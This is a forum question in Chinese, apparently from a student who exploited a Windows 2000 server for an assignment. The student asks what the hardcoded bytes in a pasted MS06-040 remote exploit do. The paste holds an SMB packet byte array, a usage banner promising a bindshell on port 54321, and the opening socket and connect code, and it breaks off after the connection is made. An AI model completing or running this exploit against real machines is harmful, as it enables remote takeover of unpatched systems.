-1
[Buffer - overflow exploit code][1]
嗨,我做了一个利用Windows 2000服务器作为任务的一部分,需要一点帮助。我已经附上了一个在c文件中的漏洞利用代码截图,但我真的不明白这个代码的作用,并且想知道是否有人会向我解释这个硬代码在漏洞利用中究竟做了什么。到目前为止,我知道这个代码为我提供了一个远程绑定外壳在端口54321缓冲区溢出漏洞利用代码
char peer0_14[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d,
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c,
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02,
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c,
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00,
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00,
0x00, 0x00 };
int main(int argc,char **argv)
{
int fd;
int con;
int repbf[20000];
struct sockaddr_in target;
if(argc < 2)
{
printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n");
printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n");
printf("Win2k should give a crash in services.exe\n");
printf("I've used the default smbdomain: WORKGROUP\n\n");
printf("Usage: %s <ip>\n",argv[0]);
printf("Example: %s 192.168.1.103\n\n",argv[0]);
printf("Written by: Preddy\n");
printf("RootShell Security Group\n");
printf("www.team-rootshell.com\n");
exit(1);
}
fd = socket(AF_INET,SOCK_STREAM,0);
if(fd < 0)
{
perror("Could not create socket\n");
exit(1);
}
printf("Target: %s\n",argv[1]);
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(argv[1]);
target.sin_port = htons(PORT);
con = connect(fd,(struct sockaddr_in *)&target,sizeof(target));
if(con < 0)
{
printf("Could not connect\n");
exit(1);
}
这是攻击代码 感谢